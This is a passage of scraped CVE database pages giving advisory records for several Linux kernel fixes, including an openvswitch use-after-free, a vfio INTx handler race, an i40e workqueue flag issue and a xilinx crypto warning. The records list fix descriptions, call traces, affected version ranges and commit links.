CR4:\n00000000007706f0\n[ +0.000000] DR0: 0000000000000000 DR1: 0000000000000000 DR2:\n0000000000000000\n[ +0.000001] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7:\n0000000000000400\n[ +0.000001] PKRU: 55555554\n[ +0.000001] Call Trace:\n[ +0.000001] \u003cTASK\u003e\n[ +0.000002] ? __warn+0x80/0x130\n[ +0.000003] ? check_flush_dependency+0x10b/0x120\n[ +0.000002] ? report_bug+0x195/0x1a0\n[ +0.000005] ? handle_bug+0x3c/0x70\n[ +0.000003] ? exc_invalid_op+0x14/0x70\n[ +0.000002] ? asm_exc_invalid_op+0x16/0x20\n[ +0.000006] ? check_flush_dependency+0x10b/0x120\n[ +0.000002] ? check_flush_dependency+0x10b/0x120\n[ +0.000002] __flush_workqueue+0x126/0x3f0\n[ +0.000015] ib_cache_cleanup_one+0x1c/0xe0 [ib_core]\n[ +0.000056] __ib_unregister_device+0x6a/0xb0 [ib_core]\n[ +0.000023] ib_unregister_device_and_put+0x34/0x50 [ib_core]\n[ +0.000020] i40iw_close+0x4b/0x90 [irdma]\n[ +0.000022] i40e_notify_client_of_netdev_close+0x54/0xc0 [i40e]\n[ +0.000035] i40e_service_task+0x126/0x190 [i40e]\n[ +0.000024] process_one_work+0x174/0x340\n[ +0.000003] worker_th\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:10:19.743Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/09b54d29f05129b092f7c793a70b689ffb3c7b2c"
},
{
"url": "https://git.kernel.org/stable/c/546d0fe9d76e8229a67369f9cb61e961d99038bd"
},
{
"url": "https://git.kernel.org/stable/c/fbbb2404340dd6178e281bd427c271f7d5ec1d22"
},
{
"url": "https://git.kernel.org/stable/c/ff7431f898dd00892a545b7d0ce7adf5b926944f"
},
{
"url": "https://git.kernel.org/stable/c/152ed360cf2d273f88fc99a518b7eb868aae2939"
},
{
"url": "https://git.kernel.org/stable/c/8d6105f637883c8c09825e962308c06e977de4f0"
},
{
"url": "https://git.kernel.org/stable/c/1594dac8b1ed78f9e75c263327e198a2e5e25b0e"
},
{
"url": "https://git.kernel.org/stable/c/2cc7d150550cc981aceedf008f5459193282425c"
}
],
"title": "i40e: Do not use WQ_MEM_RECLAIM flag for workqueue",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36004",
"datePublished": "2024-05-20T09:48:04.926Z",
"dateReserved": "2024-05-17T13:50:33.150Z",
"dateUpdated": "2025-05-04T09:10:19.743Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27395 (GCVE-0-2024-27395)
Vulnerability from cvelistv5
Published
2024-05-09 16:37
Modified
2025-05-04 09:04
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: openvswitch: Fix Use-After-Free in ovs_ct_exit
Since kfree_rcu, which is called in the hlist_for_each_entry_rcu traversal
of ovs_ct_limit_exit, is not part of the RCU read critical section, it
is possible that the RCU grace period will pass during the traversal and
the key will be free.
To prevent this, it should be changed to hlist_for_each_entry_safe.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 11efd5cb04a184eea4f57b68ea63dddd463158d1 Version: 11efd5cb04a184eea4f57b68ea63dddd463158d1 Version: 11efd5cb04a184eea4f57b68ea63dddd463158d1 Version: 11efd5cb04a184eea4f57b68ea63dddd463158d1 Version: 11efd5cb04a184eea4f57b68ea63dddd463158d1 Version: 11efd5cb04a184eea4f57b68ea63dddd463158d1 Version: 11efd5cb04a184eea4f57b68ea63dddd463158d1 Version: 11efd5cb04a184eea4f57b68ea63dddd463158d1 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:34:52.145Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2db9a8c0a01fa1c762c1e61a13c212c492752994"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/589523cf0b384164e445dd5db8d5b1bf97982424"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/35880c3fa6f8fe281a19975d2992644588ca33d3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9048616553c65e750d43846f225843ed745ec0d4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bca6fa2d9a9f560e6b89fd5190b05cc2f5d422c1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eaa5e164a2110d2fb9e16c8a29e4501882235137"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/edee0758747d7c219e29db9ed1d4eb33e8d32865"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5ea7b72d4fac2fdbc0425cd8f2ea33abe95235b2"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27395",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:43:26.319846Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:26.879Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/openvswitch/conntrack.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "2db9a8c0a01fa1c762c1e61a13c212c492752994",
"status": "affected",
"version": "11efd5cb04a184eea4f57b68ea63dddd463158d1",
"versionType": "git"
},
{
"lessThan": "589523cf0b384164e445dd5db8d5b1bf97982424",
"status": "affected",
"version": "11efd5cb04a184eea4f57b68ea63dddd463158d1",
"versionType": "git"
},
{
"lessThan": "35880c3fa6f8fe281a19975d2992644588ca33d3",
"status": "affected",
"version": "11efd5cb04a184eea4f57b68ea63dddd463158d1",
"versionType": "git"
},
{
"lessThan": "9048616553c65e750d43846f225843ed745ec0d4",
"status": "affected",
"version": "11efd5cb04a184eea4f57b68ea63dddd463158d1",
"versionType": "git"
},
{
"lessThan": "bca6fa2d9a9f560e6b89fd5190b05cc2f5d422c1",
"status": "affected",
"version": "11efd5cb04a184eea4f57b68ea63dddd463158d1",
"versionType": "git"
},
{
"lessThan": "eaa5e164a2110d2fb9e16c8a29e4501882235137",
"status": "affected",
"version": "11efd5cb04a184eea4f57b68ea63dddd463158d1",
"versionType": "git"
},
{
"lessThan": "edee0758747d7c219e29db9ed1d4eb33e8d32865",
"status": "affected",
"version": "11efd5cb04a184eea4f57b68ea63dddd463158d1",
"versionType": "git"
},
{
"lessThan": "5ea7b72d4fac2fdbc0425cd8f2ea33abe95235b2",
"status": "affected",
"version": "11efd5cb04a184eea4f57b68ea63dddd463158d1",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/openvswitch/conntrack.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.18"
},
{
"lessThan": "4.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.313",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.158",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.30",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.313",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.158",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.90",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.30",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.9",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: openvswitch: Fix Use-After-Free in ovs_ct_exit\n\nSince kfree_rcu, which is called in the hlist_for_each_entry_rcu traversal\nof ovs_ct_limit_exit, is not part of the RCU read critical section, it\nis possible that the RCU grace period will pass during the traversal and\nthe key will be free.\n\nTo prevent this, it should be changed to hlist_for_each_entry_safe."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:04:04.943Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/2db9a8c0a01fa1c762c1e61a13c212c492752994"
},
{
"url": "https://git.kernel.org/stable/c/589523cf0b384164e445dd5db8d5b1bf97982424"
},
{
"url": "https://git.kernel.org/stable/c/35880c3fa6f8fe281a19975d2992644588ca33d3"
},
{
"url": "https://git.kernel.org/stable/c/9048616553c65e750d43846f225843ed745ec0d4"
},
{
"url": "https://git.kernel.org/stable/c/bca6fa2d9a9f560e6b89fd5190b05cc2f5d422c1"
},
{
"url": "https://git.kernel.org/stable/c/eaa5e164a2110d2fb9e16c8a29e4501882235137"
},
{
"url": "https://git.kernel.org/stable/c/edee0758747d7c219e29db9ed1d4eb33e8d32865"
},
{
"url": "https://git.kernel.org/stable/c/5ea7b72d4fac2fdbc0425cd8f2ea33abe95235b2"
}
],
"title": "net: openvswitch: Fix Use-After-Free in ovs_ct_exit",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27395",
"datePublished": "2024-05-09T16:37:15.196Z",
"dateReserved": "2024-02-25T13:47:42.677Z",
"dateUpdated": "2025-05-04T09:04:04.943Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26812 (GCVE-0-2024-26812)
Vulnerability from cvelistv5
Published
2024-04-05 08:24
Modified
2025-05-04 08:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
vfio/pci: Create persistent INTx handler
A vulnerability exists where the eventfd for INTx signaling can be
deconfigured, which unregisters the IRQ handler but still allows
eventfds to be signaled with a NULL context through the SET_IRQS ioctl
or through unmask irqfd if the device interrupt is pending.
Ideally this could be solved with some additional locking; the igate
mutex serializes the ioctl and config space accesses, and the interrupt
handler is unregistered relative to the trigger, but the irqfd path
runs asynchronous to those. The igate mutex cannot be acquired from the
atomic context of the eventfd wake function. Disabling the irqfd
relative to the eventfd registration is potentially incompatible with
existing userspace.
As a result, the solution implemented here moves configuration of the
INTx interrupt handler to track the lifetime of the INTx context object
and irq_type configuration, rather than registration of a particular
trigger eventfd. Synchronization is added between the ioctl path and
eventfd_signal() wrapper such that the eventfd trigger can be
dynamically updated relative to in-flight interrupts or irqfd callbacks.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26812",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-05T14:00:34.055358Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:20:45.884Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.527Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b18fa894d615c8527e15d96b76c7448800e13899"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/27d40bf72dd9a6600b76ad05859176ea9a1b4897"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4cb0d7532126d23145329826c38054b4e9a05e7c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7d29d4c72c1e196cce6969c98072a272d1a703b3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/69276a555c740acfbff13fb5769ee9c92e1c828e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4c089cefe30924fbe20dd1ee92774ea1f5eca834"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0e09cf81959d9f12b75ad5c6dd53d237432ed034"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/18c198c96a815c962adc2b9b77909eec0be7df4d"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/vfio/pci/vfio_pci_intrs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b18fa894d615c8527e15d96b76c7448800e13899",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "27d40bf72dd9a6600b76ad05859176ea9a1b4897",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "4cb0d7532126d23145329826c38054b4e9a05e7c",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "7d29d4c72c1e196cce6969c98072a272d1a703b3",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "69276a555c740acfbff13fb5769ee9c92e1c828e",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "4c089cefe30924fbe20dd1ee92774ea1f5eca834",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "0e09cf81959d9f12b75ad5c6dd53d237432ed034",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "18c198c96a815c962adc2b9b77909eec0be7df4d",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/vfio/pci/vfio_pci_intrs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.6"
},
{
"lessThan": "3.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nvfio/pci: Create persistent INTx handler\n\nA vulnerability exists where the eventfd for INTx signaling can be\ndeconfigured, which unregisters the IRQ handler but still allows\neventfds to be signaled with a NULL context through the SET_IRQS ioctl\nor through unmask irqfd if the device interrupt is pending.\n\nIdeally this could be solved with some additional locking; the igate\nmutex serializes the ioctl and config space accesses, and the interrupt\nhandler is unregistered relative to the trigger, but the irqfd path\nruns asynchronous to those. The igate mutex cannot be acquired from the\natomic context of the eventfd wake function. Disabling the irqfd\nrelative to the eventfd registration is potentially incompatible with\nexisting userspace.\n\nAs a result, the solution implemented here moves configuration of the\nINTx interrupt handler to track the lifetime of the INTx context object\nand irq_type configuration, rather than registration of a particular\ntrigger eventfd. Synchronization is added between the ioctl path and\neventfd_signal() wrapper such that the eventfd trigger can be\ndynamically updated relative to in-flight interrupts or irqfd callbacks."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:57:07.696Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b18fa894d615c8527e15d96b76c7448800e13899"
},
{
"url": "https://git.kernel.org/stable/c/27d40bf72dd9a6600b76ad05859176ea9a1b4897"
},
{
"url": "https://git.kernel.org/stable/c/4cb0d7532126d23145329826c38054b4e9a05e7c"
},
{
"url": "https://git.kernel.org/stable/c/7d29d4c72c1e196cce6969c98072a272d1a703b3"
},
{
"url": "https://git.kernel.org/stable/c/69276a555c740acfbff13fb5769ee9c92e1c828e"
},
{
"url": "https://git.kernel.org/stable/c/4c089cefe30924fbe20dd1ee92774ea1f5eca834"
},
{
"url": "https://git.kernel.org/stable/c/0e09cf81959d9f12b75ad5c6dd53d237432ed034"
},
{
"url": "https://git.kernel.org/stable/c/18c198c96a815c962adc2b9b77909eec0be7df4d"
}
],
"title": "vfio/pci: Create persistent INTx handler",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26812",
"datePublished": "2024-04-05T08:24:42.627Z",
"dateReserved": "2024-02-19T14:20:24.180Z",
"dateUpdated": "2025-05-04T08:57:07.696Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26877 (GCVE-0-2024-26877)
Vulnerability from cvelistv5
Published
2024-04-17 10:27
Modified
2025-05-04 08:58
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
crypto: xilinx - call finalize with bh disabled
When calling crypto_finalize_request, BH should be disabled to avoid
triggering the following calltrace:
------------[ cut here ]------------
WARNING: CPU: 2 PID: 74 at crypto/crypto_engine.c:58 crypto_finalize_request+0xa0/0x118
Modules linked in: cryptodev(O)
CPU: 2 PID: 74 Comm: firmware:zynqmp Tainted: G O 6.8.0-rc1-yocto-standard #323
Hardware name: ZynqMP ZCU102 Rev1.0 (DT)
pstate: 40000005 (nZcv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)
pc : crypto_finalize_request+0xa0/0x118
lr : crypto_finalize_request+0x104/0x118
sp : ffffffc085353ce0
x29: ffffffc085353ce0 x28: 0000000000000000 x27: ffffff8808ea8688
x26: ffffffc081715038 x25: 0000000000000000 x24: ffffff880100db00
x23: ffffff880100da80 x22: 0000000000000000 x21: 0000000000000000
x20: ffffff8805b14000 x19: ffffff880100da80 x18: 0000000000010450
x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000
x14: 0000000000000003 x13: 0000000000000000 x12: ffffff880100dad0
x11: 0000000000000000 x10: ffffffc0832dcd08 x9 : ffffffc0812416d8
x8 : 00000000000001f4 x7 : ffffffc0830d2830 x6 : 0000000000000001
x5 : ffffffc082091000 x4 : ffffffc082091658 x3 : 0000000000000000
x2 : ffffffc7f9653000 x1 : 0000000000000000 x0 : ffffff8802d20000
Call trace:
crypto_finalize_request+0xa0/0x118
crypto_finalize_aead_request+0x18/0x30
zynqmp_handle_aes_req+0xcc/0x388
crypto_pump_work+0x168/0x2d8
kthread_worker_fn+0xfc/0x3a0
kthread+0x118/0x138
ret_from_fork+0x10/0x20
irq event stamp: 40
hardirqs last enabled at (39): [<ffffffc0812416f8>] _raw_spin_unlock_irqrestore+0x70/0xb0
hardirqs last disabled at (40): [<ffffffc08122d208>] el1_dbg+0x28/0x90
softirqs last enabled at (36): [<ffffffc080017dec>] kernel_neon_begin+0x8c/0xf0
softirqs last disabled at (34): [<ffffffc080017dc0>] kernel_neon_begin+0x60/0xf0
---[ end trace 0000000000000000 ]---
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5 Version: 4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5 Version: 4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5 Version: 4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5 Version: 4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5 Version: 4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5 Version: 4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.426Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8a01335aedc50a66d04dd39203c89f4bc8042596"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/03e6d4e948432a61b35783323b6ab2be071d2619"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a71f66bd5f7b9b35a8aaa49e29565eca66299399"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/23bc89fdce71124cd2126fc919c7076e7cb489cf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9db89b1fb85557892e6681724b367287de5f9f20"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dbf291d8ffffb70f48286176a15c6c54f0bb0743"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a853450bf4c752e664abab0b2fad395b7ad7701c"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26877",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:48:28.996233Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:26.216Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/crypto/xilinx/zynqmp-aes-gcm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8a01335aedc50a66d04dd39203c89f4bc8042596",
"status": "affected",
"version": "4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5",
"versionType": "git"
},
{
"lessThan": "03e6d4e948432a61b35783323b6ab2be071d2619",
"status": "affected",
"version": "4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5",
"versionType": "git"
},
{
"lessThan": "a71f66bd5f7b9b35a8aaa49e29565eca66299399",
"status": "affected",
"version": "4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5",
"versionType": "git"
},
{
"lessThan": "23bc89fdce71124cd2126fc919c7076e7cb489cf",
"status": "affected",
"version": "4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5",
"versionType": "git"
},
{
"lessThan": "9db89b1fb85557892e6681724b367287de5f9f20",
"status": "affected",
"version": "4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5",
"versionType": "git"
},
{
"lessThan": "dbf291d8ffffb70f48286176a15c6c54f0bb0743",
"status": "affected",
"version": "4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5",
"versionType": "git"
},
{
"lessThan": "a853450bf4c752e664abab0b2fad395b7ad7701c",
"status": "affected",
"version": "4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
